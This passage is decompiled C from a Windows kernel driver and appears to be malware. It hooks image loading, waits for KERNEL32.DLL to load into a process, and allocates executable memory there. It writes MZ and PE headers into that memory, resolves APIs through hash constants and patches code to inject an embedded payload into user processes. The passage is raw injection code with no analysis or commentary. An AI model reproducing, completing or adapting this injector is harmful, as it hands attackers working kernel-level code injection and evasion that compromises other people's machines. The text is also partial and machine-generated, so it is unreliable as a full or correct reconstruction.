*(_DWORD *)(a1 - 4) = -1;

v4 = *(_DWORD *)(a1 + 12);

v3 = *(_DWORD *)(a1 - 28);

if ( v3 != 259 )

{

if ( v3 )

*(_DWORD *)(v4 + 28) = 0;

*(_DWORD *)(v4 + 24) = v3;

IofCompleteRequest((PIRP)v4, 0);

}

return _SEH_epilog();

}

// 12463: using guessed type int _SEH_epilog(void);

//----- (00010C22) --------------------------------------------------------

signed int __usercall sub_10C22<eax>(int a1<eax>)

{

int v1; // edi@1

int v2; // eax@3

unsigned int v3; // esi@3

int v4; // ecx@3

signed int v6; // esi@6

int v7; // edi@9

struct _KMUTANT *v8; // [sp+10h] [bp-20h]@1

ULONG v9; // [sp+14h] [bp-1Ch]@1

LSA_UNICODE_STRING ValueName; // [sp+18h] [bp-18h]@1

LSA_UNICODE_STRING DestinationString; // [sp+20h] [bp-10h]@1

char v12; // [sp+28h] [bp-8h]@2

v1 = a1;

RtlInitUnicodeString(&DestinationString, &word_14395);

RtlInitUnicodeString(&ValueName, &word_1445D);

v8 = (struct _KMUTANT *)(v1 + 8);

KeWaitForSingleObject((PVOID)(v1 + 8), 0, 0, 0, 0);

v9 = sub_11D62(&DestinationString, &ValueName, v1);

if ( v9 )

{

RtlInitUnicodeString((PUNICODE_STRING)&v12, &word_14471);

v9 = sub_10638((LSA_UNICODE_STRING *)&v12, dword_14539, v1);

if ( v9 )

{

LABEL_6:

v6 = -1073741823;

goto LABEL_7;

}

}

v2 = *(_DWORD *)(v1 + 4);

v3 = *(_DWORD *)(v2 + 4);

sub_11EC6(dword_1453D, *(_DWORD *)v2, v3);

if ( sub_11D46(v4, v3) )

{

KeReleaseMutex(v8, 0);

return -1073741823;

}

v6 = v9;

if ( !v9 )

{

v7 = *(_DWORD *)(v1 + 4);

if ( v7 && *(_DWORD *)(v7 + 4) > 0u )

{

v6 = 0;

goto LABEL_7;

}

goto LABEL_6;

}

LABEL_7:

KeReleaseMutex(v8, 0);

return v6;

}

// 14539: using guessed type int dword_14539;

// 1453D: using guessed type int dword_1453D;

//----- (00010CFE) --------------------------------------------------------

signed int __stdcall sub_10CFE(int a1, int a2)

{

int v2; // eax@1

int v3; // edi@1

int v4; // esi@1

int v5; // eax@2

signed int v6; // edi@5

int v8; // [sp+10h] [bp-4h]@1

v3 = a1;

v4 = 0;

v8 = 0;

KeWaitForSingleObject((PVOID)(a1 + 8), 0, 0, 0, 0);

v2 = (int)ExAllocatePool(0, 0x10u);

if ( v2 )

{

v5 = sub_105A0((int)&v8, *(_DWORD *)(*(_DWORD *)(a1 + 4) + 4), v2, **(const void ***)(a1 + 4));

v3 = a1;

v4 = 0;

}

else

{

v5 = 0;

}

sub_1076E(a2, (PVOID *)v5);

if ( v8 == v4 )

{

if ( *(_DWORD *)(v3 + 4) == v4 )

v6 = -1073741823;

else

v6 = 0;

}

else

{

v6 = v8;

}

KeReleaseMutex((PRKMUTEX)(a1 + 8), v4);

return v6;

}

//----- (00010D7E) --------------------------------------------------------

void __usercall sub_10D7E(int a1<eax>)

{

PVOID *v1; // edi@2

if ( *(_BYTE *)a1 )

{

v1 = *(PVOID **)(a1 + 4);

*(_BYTE *)a1 = 0;

if ( v1 )

{

if ( *v1 )

ExFreePoolWithTag(*v1, 0);

ExFreePoolWithTag(v1, 0);

}

}

}

//----- (00010DA8) --------------------------------------------------------

int __usercall sub_10DA8<eax>(int a1<ecx>, int a2<edi>, int a3<esi>)

{

int v4; // eax@1

int v5; // [sp+0h] [bp-4h]@1

v5 = a1;

sub_10FC4(a3, (int)&v5);

*(_DWORD *)a2 = *(_DWORD *)(a3 + 8) + *(_DWORD *)a3;

v4 = v5;

*(_DWORD *)(a2 + 4) = v5;

*(_DWORD *)(a3 + 8) += v4;

return a3;

}

//----- (00010DCC) --------------------------------------------------------

void __stdcall sub_10DCC(int a1, HANDLE Handle, int a3)

{

int v3; // ecx@9

int v4; // esi@9

int v5; // ebx@12

int v6; // ecx@12

int v7; // eax@14

int i; // [sp+10h] [bp-50h]@4

unsigned int v9; // [sp+14h] [bp-4Ch]@9

RTL_GENERIC_TABLE *v10; // [sp+18h] [bp-48h]@8

int v11; // [sp+1Ch] [bp-44h]@8

int v12; // [sp+20h] [bp-40h]@9

char v13; // [sp+24h] [bp-3Ch]@8

int v14; // [sp+28h] [bp-38h]@8

int v15; // [sp+2Ch] [bp-34h]@9

int v16; // [sp+30h] [bp-30h]@9

int v17; // [sp+34h] [bp-2Ch]@11

int v18; // [sp+38h] [bp-28h]@11

int v19; // [sp+3Ch] [bp-24h]@4

char v20; // [sp+40h] [bp-20h]@7

WCHAR *v21; // [sp+44h] [bp-1Ch]@11

char v22; // [sp+4Ch] [bp-14h]@14

int v23; // [sp+54h] [bp-Ch]@9

unsigned int v24; // [sp+58h] [bp-8h]@9

int v25; // [sp+5Ch] [bp-4h]@9

if ( sub_117A8(L"KERNEL32.DLL", a1) )

{

sub_1174A((int)Handle, a3);

}

else

{

if ( !sub_10542() )

{

i = 0;

sub_11F42((int)&v19, (int)&i, Handle);

if ( !i )

{

if ( v19 == *(_DWORD *)(a3 + 4) )

{

if ( !(dword_14391 & 4) || !v20 )

{

sub_10B36((int)&v10);

sub_11066((int)Handle, v10);

v13 = 1;

v14 = 0;

sub_10AE2((int)&v11);

if ( !sub_10CFE(v11, (int)&v13) )

{

v3 = *(_DWORD *)v14;

v24 = *(_DWORD *)(v14 + 4);

v23 = v3;

v25 = 0;

v15 = 0;

v16 = 0;

sub_10FC4((int)&v23, (int)&v12);

sub_10DA8(v3, (int)&v15, (int)&v23);

sub_10FC4((int)&v23, (int)&v9);

v4 = v25;

if ( v25 <= v24 )

{

if ( !v12 )

{

v21 = 0;

v17 = 0;

v18 = 0;

for ( i = 0; i < v9; ++i )

{

v5 = v4 + v23;

v25 = v4 + 16;

v12 = v4 + v23;

sub_10DA8(v3, (int)&v21, (int)&v23);

sub_10DA8(v6, (int)&v17, (int)&v23);

v4 = v25;

if ( v25 > v24 )

break;

if ( sub_117A8(v21, a1) )

{

v7 = sub_111B4((int)&v15, (int)&v22, *(_DWORD *)(v5 + 12));

sub_11522((int)Handle, a3, v12, (int)&v17, v7);

}

}

}

}

}

sub_10D7E((int)&v13);

}

}

}

}

}

}

// 124E0: using guessed type wchar_t aKernel32_dll[13];

// 14391: using guessed type int dword_14391;

//----- (00010F80) --------------------------------------------------------

void __stdcall NotifyRoutine(int a1, HANDLE Handle, int a3)

{

if ( KeGetCurrentIrql() <= 1u )

{

if ( Handle )

sub_10DCC(a1, Handle, a3);

}

}

//----- (00010FC4) --------------------------------------------------------

int __userpurge sub_10FC4<eax>(int result<eax>, int a2)

{

int v2; // ecx@1

v2 = *(_DWORD *)(result + 8);

if ( (unsigned int)(v2 + 4) <= *(_DWORD *)(result + 4) )

*(_DWORD *)a2 = *(_DWORD *)(v2 + *(_DWORD *)result);

*(_DWORD *)(result + 8) = v2 + 4;

return result;

}

//----- (00010FE6) --------------------------------------------------------

RTL_GENERIC_TABLE *__cdecl sub_10FE6()

{

memset(&Table, 0, sizeof(Table));

byte_14658 = -1;

dword_14654 = 0;

dword_1465C = 0;

dword_14660 = 0;

RtlInitializeGenericTable(

&Table,

(PRTL_GENERIC_COMPARE_ROUTINE)CompareRoutine,

(PRTL_GENERIC_ALLOCATE_ROUTINE)AllocateRoutine,

(PRTL_GENERIC_FREE_ROUTINE)FreeRoutine,

0);

return &Table;

}

// 14654: using guessed type int dword_14654;

// 14658: using guessed type char byte_14658;

// 1465C: using guessed type int dword_1465C;

// 14660: using guessed type int dword_14660;

//----- (00011028) --------------------------------------------------------

PVOID __usercall sub_11028<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>)

{

PKSPIN_LOCK v2; // ecx@1

PVOID v3; // esi@1

PVOID v4; // eax@1

char v5; // zf@1

KIRQL v6; // dl@2

int Buffer; // [sp+8h] [bp-18h]@1

PKSPIN_LOCK SpinLock; // [sp+1Ch] [bp-4h]@1

Buffer = a1;

sub_1118A((int)&SpinLock, (int)&a2[1]);

v4 = RtlLookupElementGenericTable(a2, &Buffer);

v2 = SpinLock;

v5 = SpinLock[3] == 1;

--v2[3];

v3 = v4;

if ( v5 )

{

v6 = *((_BYTE *)v2 + 4);

v2[2] = 0;

KfReleaseSpinLock(v2, v6);

}

return v3;

}

//----- (00011066) --------------------------------------------------------

signed int __usercall sub_11066<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>)

{

int v2; // ecx@1

BOOLEAN v3; // al@1

char v4; // zf@2

KIRQL v5; // dl@3

signed int result; // eax@4

char v7; // zf@5

KIRQL v8; // dl@6

int Buffer; // [sp+8h] [bp-18h]@1

int v10; // [sp+1Ch] [bp-4h]@1

Buffer = a1;

sub_1118A((int)&v10, (int)&a2[1]);

v3 = RtlDeleteElementGenericTable(a2, &Buffer);

v2 = v10;

if ( v3 )

{

v7 = *(_DWORD *)(v10 + 12)-- == 1;

if ( v7 )

{

v8 = *(_BYTE *)(v2 + 4);

*(_DWORD *)(v2 + 8) = 0;

KfReleaseSpinLock((PKSPIN_LOCK)v2, v8);

}

result = 0;

}

else

{

v4 = *(_DWORD *)(v10 + 12)-- == 1;

if ( v4 )

{

v5 = *(_BYTE *)(v2 + 4);

*(_DWORD *)(v2 + 8) = 0;

KfReleaseSpinLock((PKSPIN_LOCK)v2, v5);

}

result = -1073741823;

}

return result;

}

//----- (000110C0) --------------------------------------------------------

signed int __userpurge sub_110C0<eax>(RTL_GENERIC_TABLE *a1<eax>, int *a2)

{

RTL_GENERIC_TABLE *v2; // edi@1

PKSPIN_LOCK v3; // ecx@3

char v4; // zf@3

PVOID v6; // eax@7

char v7; // zf@8

char v8; // zf@10

KIRQL v9; // dl@11

PKSPIN_LOCK SpinLock; // [sp+Ch] [bp-4h]@1

v2 = a1;

sub_1118A((int)&SpinLock, (int)&a1[1]);

if ( sub_11028(*a2, v2) && sub_11066(*a2, v2) )

{

v3 = SpinLock;

v4 = SpinLock[3] == 1;

--v3[3];

if ( !v4 )

return -1073741823;

v3[2] = 0;

LABEL_5:

KfReleaseSpinLock(v3, *((_BYTE *)v3 + 4));

return -1073741823;

}

v6 = RtlInsertElementGenericTable(v2, a2, 0x14u, 0);

v3 = SpinLock;

if ( !v6 )

{

v7 = SpinLock[3]-- == 1;

if ( !v7 )

return -1073741823;

v3[2] = 0;

goto LABEL_5;

}

v8 = SpinLock[3]-- == 1;

if ( v8 )

{

v9 = *((_BYTE *)v3 + 4);

v3[2] = 0;

KfReleaseSpinLock(v3, v9);

}

return 0;

}

//----- (00011142) --------------------------------------------------------

bool __stdcall CompareRoutine(int a1, int a2, int a3)

{

bool result; // eax@2

if ( *(_DWORD *)a2 == *(_DWORD *)a3 )

result = 2;

else

result = *(_DWORD *)a2 >= *(_DWORD *)a3;

return result;

}

//----- (00011160) --------------------------------------------------------

PVOID __stdcall AllocateRoutine(int a1, SIZE_T NumberOfBytes)

{

return ExAllocatePool(0, NumberOfBytes);

}

//----- (00011172) --------------------------------------------------------

void __stdcall FreeRoutine(int a1, PVOID P)

{

if ( P )

ExFreePoolWithTag(P, 0);

}

//----- (0001118A) --------------------------------------------------------

int __usercall sub_1118A<eax>(int a1<ebx>, int a2<esi>)

{

PKTHREAD v2; // edi@1

KIRQL v3; // al@2

*(_DWORD *)a1 = a2;

v2 = KeGetCurrentThread();

if ( v2 != *(PKTHREAD *)(a2 + 8) )

{

v3 = KfAcquireSpinLock((PKSPIN_LOCK)a2);

*(_DWORD *)(a2 + 12) = 0;

*(_BYTE *)(a2 + 4) = v3;

*(_DWORD *)(a2 + 8) = v2;

}

++*(_DWORD *)(a2 + 12);

return a1;

}

//----- (000111B4) --------------------------------------------------------

int __userpurge sub_111B4<eax>(int a1<eax>, int a2<ebx>, int a3)

{

int v3; // esi@1

int v4; // ecx@2

int v5; // ecx@4

int v7; // [sp+8h] [bp-24h]@2

unsigned int v8; // [sp+Ch] [bp-20h]@2

unsigned int v9; // [sp+10h] [bp-1Ch]@2

int v10; // [sp+14h] [bp-18h]@2

int v11; // [sp+18h] [bp-14h]@2

int v12; // [sp+1Ch] [bp-10h]@4

unsigned int v13; // [sp+20h] [bp-Ch]@2

unsigned int v14; // [sp+24h] [bp-8h]@3

v3 = 0;

if ( a3

&& (v4 = *(_DWORD *)a1,

v8 = *(_DWORD *)(a1 + 4),

v7 = v4,

v9 = 0,

v10 = 0,

v11 = 0,

sub_10FC4((int)&v7, (int)&v13),

v9 <= v8)

&& (v14 = 0, v13 > 0) )

{

while ( 1 )

{

sub_10FC4((int)&v7, (int)&v12);

sub_10DA8(v5, (int)&v10, (int)&v7);

if ( v9 > v8 )

{

LABEL_7:

v3 = 0;

goto LABEL_8;

}

if ( a3 == v12 )

break;

++v14;

if ( v14 >= v13 )

goto LABEL_7;

}

*(_DWORD *)a2 = v10;

*(_DWORD *)(a2 + 4) = v11;

}

else

{

LABEL_8:

*(_DWORD *)a2 = v3;

*(_DWORD *)(a2 + 4) = v3;

}

return a2;

}

//----- (00011242) --------------------------------------------------------

signed int __userpurge sub_11242<eax>(int a1<eax>, int a2, int a3)

{

signed int result; // eax@1

PVOID v4; // eax@2

PVOID v5; // edi@2

int v6; // eax@4

int v7; // ebx@4

unsigned int v8; // esi@4

void *v9; // ST08_4@4

int v10; // ecx@10

char v11; // [sp+10h] [bp-38h]@1

int v12; // [sp+18h] [bp-30h]@4

int v13; // [sp+1Ch] [bp-2Ch]@4

int v14; // [sp+30h] [bp-18h]@8

int v15; // [sp+34h] [bp-14h]@7

unsigned int v16; // [sp+38h] [bp-10h]@8

int v17; // [sp+3Ch] [bp-Ch]@8

unsigned int v18; // [sp+40h] [bp-8h]@4

int v19; // [sp+44h] [bp-4h]@6

result = sub_121E1((int)&v11, *(_DWORD *)(a1 + 4), 1);

if ( !result )

{

v4 = sub_1182C(dword_12680 + 4981);

v5 = v4;

if ( v4

&& (v7 = (int)((char *)v4 + 4981),

memcpy(v4, &unk_12EB8, 0x1375u),

memcpy((char *)v5 + 4981, &unk_12694, dword_12680),

*(_WORD *)v7 = 23117,

*(_DWORD *)(dword_1268C + v7) = 17744,

*(_WORD *)(dword_12690 + v7) = 267,

v9 = (void *)(v7 + dword_12688),

*(_DWORD *)(a3 + 4) = v7 + dword_12688,

memset(v9, 0, 0x98u),

*(_DWORD *)(*(_DWORD *)(a3 + 4) + 88) = v5,

*(_DWORD *)(*(_DWORD *)(a3 + 4) + 96) = v7,

*(_DWORD *)(*(_DWORD *)(a3 + 4) + 104) = dword_12680,

v18 = v12 + *(_DWORD *)(v13 + 40),

v8 = v18,

(v6 = sub_1210F((int)&v11, v18)) != 0)

&& v12 + *(_DWORD *)(v6 + 8) + *(_DWORD *)(v6 + 12) >= v8 + 12 )

{

result = sub_118E2(v8, (int)&v11);

v19 = result;

if ( !result )

{

sub_10A8A((int)&v15, &v19);

result = v19;

if ( !v19 )

{

v16 = v18;

v17 = 12;

result = (*(int (__stdcall **)(signed int, unsigned int *, int *, signed int, int *))v15)(

-1,

&v16,

&v17,

128,

&v14);

if ( !result )

{

result = sub_11864((HANDLE *)(*(_DWORD *)(a3 + 4) + 144));

if ( !result )

{

v10 = v14;

*(_DWORD *)a3 = a2;

*(_DWORD *)(a3 + 8) = v7 + dword_12684;

*(_DWORD *)(a3 + 12) = v18;

*(_DWORD *)(*(_DWORD *)(a3 + 4) + 136) = v10;

result = 0;

}

}

}

}

}

else

{

result = -1073741823;

}

}

return result;

}

// 12684: using guessed type int dword_12684;

// 12688: using guessed type int dword_12688;

// 1268C: using guessed type int dword_1268C;

// 12690: using guessed type int dword_12690;

//----- (000113C2) --------------------------------------------------------

PVOID __userpurge sub_113C2<eax>(int a1<edi>, int a2, int a3)

{

PVOID result; // eax@1

PVOID v4; // esi@1

int v5; // ebx@2

result = sub_1182C(*(_DWORD *)(a1 + 4) + 40);

v4 = result;

if ( result )

{

v5 = (int)((char *)result + 40);

memcpy((char *)result + 40, *(const void **)a1, *(_DWORD *)(a1 + 4));

*((_DWORD *)v4 + 2) = v5;

*((_DWORD *)v4 + 4) = *(_DWORD *)(a1 + 4);

*((_WORD *)v4 + 12) = *(_WORD *)(a2 + 4);

*((_BYTE *)v4 + 32) = (*(_BYTE *)(a2 + 6) >> 1) & 1;

*(_DWORD *)v4 = *(_DWORD *)(*(_DWORD *)(a3 + 4) + 112);

result = *(PVOID *)(a3 + 4);

*((_DWORD *)result + 28) = v4;

}

return result;

}

//----- (0001141E) --------------------------------------------------------

void __userpurge sub_1141E(int a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5)

{

int v5; // esi@1

char v6; // zf@1

int v7; // edi@2

int v8; // edi@4

int v9; // eax@6

int v10; // eax@10

RTL_GENERIC_TABLE *v11; // edi@10

char v12; // [sp+8h] [bp-30h]@11

LSA_UNICODE_STRING DestinationString; // [sp+1Ch] [bp-1Ch]@3

PCWSTR v14; // [sp+24h] [bp-14h]@2

int v15; // [sp+28h] [bp-10h]@9

char v16; // [sp+2Ch] [bp-Ch]@1

int v17; // [sp+30h] [bp-8h]@1

RTL_GENERIC_TABLE *v18; // [sp+34h] [bp-4h]@10

v17 = 0;

v6 = (*(_BYTE *)(a3 + 6) & 2) == 0;

v5 = a2;

v16 = 1;

if ( v6 )

{

v7 = *(_DWORD *)(a1 + 4);

v14 = *(PCWSTR *)a1;

}

else

{

RtlInitUnicodeString(&DestinationString, *(PCWSTR *)a1);

if ( sub_10638(&DestinationString, dword_14539, (int)&v16) )

{

v9 = *(_DWORD *)v5;

v7 = *(_DWORD *)(v5 + 4);

}

else

{

v8 = v17;

if ( *(_BYTE *)(a3 + 6) & 1 )

sub_11EC6(*(_DWORD *)(a3 + 8), *(_DWORD *)v17, *(_DWORD *)(v17 + 4));

v9 = *(_DWORD *)v8;

v7 = *(_DWORD *)(v8 + 4);

}

v14 = (PCWSTR)v9;

}

v15 = v7;

if ( v7 )

{

sub_10B36((int)&v18);

v11 = v18;

v10 = (int)sub_11028(a4, v18);

if ( v10 || !sub_11242(a5, a4, (int)&v12) && !sub_110C0(v11, (int *)&v12) && (v10 = (int)sub_11028(a4, v11)) != 0 )

sub_113C2((int)&v14, a3, v10);

}

sub_10D7E((int)&v16);

}

// 14539: using guessed type int dword_14539;

//----- (000114EC) --------------------------------------------------------

void __fastcall sub_114EC(int a1, int a2, int a3, int a4, int a5)

{

sub_1141E(a5, a1, a2, a3, a4);

}

//----- (00011522) --------------------------------------------------------

LONG_PTR __stdcall sub_11522(int a1, int a2, int a3, int a4, int a5)

{

void *v5; // ecx@1

char v7; // [sp+Ch] [bp-28h]@1

char v8; // [sp+10h] [bp-24h]@5

char v9; // [sp+18h] [bp-1Ch]@4

int v10; // [sp+30h] [bp-4h]@1

v10 = 0;

sub_11FC0((int)&v7, (int)&v10, a1);

if ( !v10 )

sub_114EC(a5, a3, a1, a2, a4);

if ( v7 )

{

v7 = 0;

KeUnstackDetachProcess(&v9);

}

return sub_120CC(v5, (LONG_PTR)&v8);

}

// 12600: using guessed type int __stdcall KeUnstackDetachProcess(_DWORD);

//----- (00011578) --------------------------------------------------------

PVOID __stdcall sub_11578(int a1)

{

RTL_GENERIC_TABLE *v2; // [sp+8h] [bp-4h]@1

sub_10B36((int)&v2);

return sub_11028(a1, v2);

}

//----- (00011598) --------------------------------------------------------

PVOID __stdcall sub_11598(int a1)

{

return sub_11578(a1);

}

//----- (000115CC) --------------------------------------------------------

signed int __userpurge sub_115CC<eax>(const void *a1<eax>, int a2<ebx>, int a3)

{

signed int result; // eax@1

int v4; // ST38_4@1

int v5; // esi@2

char v6; // zf@2

int v7; // edi@12

int v8; // ecx@12

int v9; // esi@12

char v10; // [sp+8h] [bp-38h]@1

char v11; // [sp+28h] [bp-18h]@1

int v12; // [sp+2Ch] [bp-14h]@2

int v13; // [sp+30h] [bp-10h]@12

int v14; // [sp+34h] [bp-Ch]@12

RTL_GENERIC_TABLE *v15; // [sp+3Ch] [bp-4h]@2

v4 = *(_DWORD *)(a2 + 4);

memcpy(&v11, a1, 0x14u);

result = sub_121E1((int)&v10, v4, 1);

if ( !result )

{

sub_10B36((int)&v15);

sub_11066(a3, v15);

v5 = v12;

*(_DWORD *)v12 = *(_DWORD *)(a2 + 4);

*(_DWORD *)(v5 + 8) = sub_1236B((int)&v10, -934890519);

*(_DWORD *)(v5 + 16) = sub_1236B((int)&v10, -1871298611);

*(_DWORD *)(v5 + 24) = sub_1236B((int)&v10, -1680372695);

*(_DWORD *)(v5 + 32) = sub_1236B((int)&v10, 578844873);

*(_DWORD *)(v5 + 40) = sub_1236B((int)&v10, 1538632765);

*(_DWORD *)(v5 + 48) = sub_1236B((int)&v10, 1538689877);

*(_DWORD *)(v5 + 56) = sub_1236B((int)&v10, -964130467);

*(_DWORD *)(v5 + 64) = sub_1236B((int)&v10, -411935863);

*(_DWORD *)(v5 + 72) = sub_1236B((int)&v10, 122157493);

result = sub_1236B((int)&v10, 201870840);

v6 = *(_DWORD *)(v5 + 8) == 0;

*(_DWORD *)(v5 + 80) = result;

if ( !v6 )

{

if ( *(_DWORD *)(v5 + 16) )

{

if ( *(_DWORD *)(v5 + 24) )

{

if ( *(_DWORD *)(v5 + 32) )

{

if ( *(_DWORD *)(v5 + 40) )

{

if ( *(_DWORD *)(v5 + 48) )

{

if ( *(_DWORD *)(v5 + 56) )

{

if ( *(_DWORD *)(v5 + 64) )

{

if ( *(_DWORD *)(v5 + 72) )

{

if ( result )

{

result = v14;

v7 = v5 + 120;

v8 = v13;

v9 = v14;

*(_DWORD *)v7 = *(_DWORD *)v14;

v9 += 4;

v7 += 4;

*(_DWORD *)v7 = *(_DWORD *)v9;

*(_DWORD *)(v7 + 4) = *(_DWORD *)(v9 + 4);

*(_DWORD *)result = *(_DWORD *)"ž";

*(_WORD *)(result + 4) = *(_WORD *)&asc_12678[4];

*(_BYTE *)(result + 6) = asc_12678[6];

*(_DWORD *)(result + 1) = v8;

}

}

}

}

}

}

}

}

}

}

}

return result;

}

//----- (00011718) --------------------------------------------------------

signed int __thiscall sub_11718(int this, int a2, const void *a3)

{

return sub_115CC(a3, this, a2);

}

//----- (0001174A) --------------------------------------------------------

__int32 __stdcall sub_1174A(int a1, int a2)

{

__int32 result; // eax@1

const void *v3; // edi@1

void *v4; // ecx@2

char v5; // [sp+8h] [bp-28h]@2

char v6; // [sp+Ch] [bp-24h]@6

char v7; // [sp+14h] [bp-1Ch]@5

int v8; // [sp+2Ch] [bp-4h]@2

result = (__int32)sub_11598(a1);

v3 = (const void *)result;

if ( result )

{

v8 = 0;

sub_11FC0((int)&v5, (int)&v8, a1);

if ( !v8 )

sub_11718(a2, a1, v3);

if ( v5 )

{

v5 = 0;

KeUnstackDetachProcess(&v7);

}

result = sub_120CC(v4, (LONG_PTR)&v6);

}

return result;

}

// 12600: using guessed type int __stdcall KeUnstackDetachProcess(_DWORD);

//----- (000117A8) --------------------------------------------------------

char __usercall sub_117A8<al>(WCHAR *a1<eax>, int a2<ecx>)

{

WCHAR *v2; // edi@1

int v3; // esi@1

WCHAR v4; // dx@2

unsigned int v5; // eax@3

int v6; // edx@3

char result; // al@4

int v8; // eax@5

WCHAR *v9; // esi@6

WCHAR v10; // bx@7

int v11; // [sp+8h] [bp-Ch]@3

unsigned int v12; // [sp+Ch] [bp-8h]@5

int v13; // [sp+10h] [bp-4h]@6

v2 = a1;

v3 = (int)(a1 + 1);

do

{

v4 = *a1;

++a1;

}

while ( v4 );

v6 = (signed int)((char *)a1 - v3) >> 1;

v5 = (unsigned __int16)(*(_WORD *)a2 >> 1);

v11 = v6;

if ( v6 <= v5 )

{

v12 = 0;

v8 = *(_DWORD *)(a2 + 4) + 2 * (v5 - v6);

if ( v6 )

{

v13 = v8 - (_DWORD)v2;

v9 = v2;

while ( 1 )

{

v10 = RtlUpcaseUnicodeChar(*(WCHAR *)((char *)v9 + v13));

if ( RtlUpcaseUnicodeChar(*v9) != v10 )

break;

++v12;

++v9;

if ( v12 >= v11 )

goto LABEL_9;

}

result = 0;

}

else

{

LABEL_9:

result = 1;

}

}

else

{

result = 0;

}

return result;

}

//----- (0001182C) --------------------------------------------------------

PVOID __usercall sub_1182C<eax>(ULONG a1<esi>)

{

PVOID result; // eax@3

PVOID BaseAddress; // [sp+0h] [bp-8h]@1

ULONG AllocationSize; // [sp+4h] [bp-4h]@1

BaseAddress = 0;

AllocationSize = a1;

if ( ZwAllocateVirtualMemory((HANDLE)0xFFFFFFFF, &BaseAddress, 0, &AllocationSize, 0x1000u, 0x40u)

|| AllocationSize < a1 )

result = 0;

else

result = BaseAddress;

return result;

}

//----- (00011864) --------------------------------------------------------

int __usercall sub_11864<eax>(HANDLE *a1<edi>)

{

signed int v1; // esi@1

int i; // esi@6

HANDLE Handle; // [sp+4h] [bp-4Ch]@3

OBJECT_ATTRIBUTES ObjectAttributes; // [sp+24h] [bp-2Ch]@1

struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+3Ch] [bp-14h]@2

LSA_UNICODE_STRING DestinationString; // [sp+44h] [bp-Ch]@1

NTSTATUS v8; // [sp+4Ch] [bp-4h]@2

RtlInitUnicodeString(&DestinationString, &SourceString);

ObjectAttributes.RootDirectory = 0;

ObjectAttributes.SecurityDescriptor = 0;

ObjectAttributes.SecurityQualityOfService = 0;

ObjectAttributes.Length = 24;

ObjectAttributes.Attributes = 64;

ObjectAttributes.ObjectName = &DestinationString;

v1 = 0;

while ( 1 )

{

v8 = ZwOpenFile(a1, 0xC0100000u, &ObjectAttributes, &IoStatusBlock, 3u, 0x60u);

if ( v8 )

break;

*(&Handle + v1++) = *a1;

if ( v1 > 7 )

goto LABEL_6;

}

++v1;

LABEL_6:

for ( i = v1 - 2; i >= 0; --i )

ZwClose(*(&Handle + i));

return v8;

}

//----- (000118E2) --------------------------------------------------------

signed int __stdcall sub_118E2(unsigned int a1, int a2)

{

signed int result; // eax@2

bool v3; // eax@3

int v4; // edx@6

int v5; // ecx@6

unsigned int v6; // eax@7

unsigned int v7; // eax@9

unsigned int v8; // edi@10

int v9; // eax@11

int i; // [sp+0h] [bp-10h]@6

unsigned int v11; // [sp+4h] [bp-Ch]@10

int v12; // [sp+8h] [bp-8h]@3

int v13; // [sp+Ch] [bp-4h]@3

if ( *(_DWORD *)(a2 + 8) == *(_DWORD *)(*(_DWORD *)(a2 + 12) + 52)

|| (v13 = 0, v12 = 0, v3 = sub_122D0(a2, 5u, (int)&v13, (int)&v12), v3 == 2) )

{

result = 0;

}

else

{

if ( v3 )

{

result = -1073741823;

}

else

{

v5 = v13;

v4 = v13 + 8;

for ( i = v13 + v12; v5 + 8 <= (unsigned int)i; v13 = v5 )

{

v6 = *(_DWORD *)(v5 + 4);

if ( !v6 )

break;

if ( v6 < 8 || (v7 = v6 - 8, v7 & 1) )

return -1073741823;

v11 = v7 >> 1;

v8 = 0;

if ( v7 >> 1 )

{

do

{

v9 = *(_DWORD *)(a2 + 8) + *(_DWORD *)v5 + (*(_WORD *)(v4 + 2 * v8) & 0xFFF);

if ( *(_WORD *)(v4 + 2 * v8) & 0xF000 )

{

if ( v9 >= a1 && v9 < a1 + 12 )

return -1073741637;

}

++v8;

}

while ( v8 < v11 );

}

v5 += *(_DWORD *)(v5 + 4);

v4 = v5 + 8;

}

result = 0;

}

}

return result;

}

//----- (000119AE) --------------------------------------------------------

char __fastcall sub_119AE(int a1, int a2)

{

int v2; // eax@1

v2 = *(_DWORD *)(a2 + 36);

return !(v2 & 0x2000000)

&& v2 & 0x20000000

&& v2 & 0x20

&& v2 & 0x40000000

&& (!strncmp((const char *)a2, ".text", 8) || !strncmp((const char *)a2, "PAGE", 8));

}

//----- (00011A08) --------------------------------------------------------

char __usercall sub_11A08<al>(int a1<edi>)

{

unsigned int v1; // ecx@1

v1 = 0;

while ( (byte_12644[v1] & *(&byte_12644[v1] + a1 - (_DWORD)byte_12644)) == byte_12630[v1] )

{

++v1;

if ( v1 >= 0x14 )

return *(_DWORD *)(a1 + 13) - *(_DWORD *)((char *)&ZwAllocateVirtualMemory + 13) == (_DWORD)((char *)ZwAllocateVirtualMemory

- a1);

}

return 0;

}

//----- (00011A4A) --------------------------------------------------------

int __userpurge sub_11A4A<eax>(int a1<eax>, int a2<ebx>, unsigned int a3)

{

int v3; // esi@1

int v4; // edx@4

int v5; // edi@4

int v6; // edx@5

unsigned int v7; // eax@6

int v9; // [sp-4h] [bp-10h]@4

unsigned int v10; // [sp+8h] [bp-4h]@1

v10 = 0;

v3 = a1;

while ( 1 )

{

if ( a3 <= v3 + 5 )

return 0;

if ( *(_BYTE *)v3 == -24 )

{

v5 = *(_DWORD *)(v3 + 1) + v3 + 5;

v4 = sub_1210F(a2, v5);

if ( v4 )

{

if ( sub_119AE(v9, v4) )

{

v7 = *(_DWORD *)(v6 + 8);

if ( v7 >= *(_DWORD *)(v6 + 16) )

v7 = *(_DWORD *)(v6 + 16);

if ( v5 + 20 <= v7 + *(_DWORD *)(a2 + 8) + *(_DWORD *)(v6 + 12) && sub_11A08(v5) )

break;

}

}

}

++v10;

++v3;

if ( v10 >= 0x1E )

return 0;

}

return v5;

}

//----- (00011ABC) --------------------------------------------------------

const char *__usercall sub_11ABC<eax>(const char *result<eax>, int a2<ecx>)

{

int v2; // ebx@1

v2 = a2 - 19;

while ( (unsigned int)result < v2 )

{

while ( (unsigned int)result <= v2 - 4 )

{

if ( *(_DWORD *)result == dword_12658 )

goto LABEL_7;

++result;

}

result = 0;

LABEL_7:

if ( !result )

break;

if ( !strncmp(result, (const char *)&dword_12658, 14) )

return result;

++result;

}

return 0;

}

// 12658: using guessed type int dword_12658;

//----- (00011B04) --------------------------------------------------------

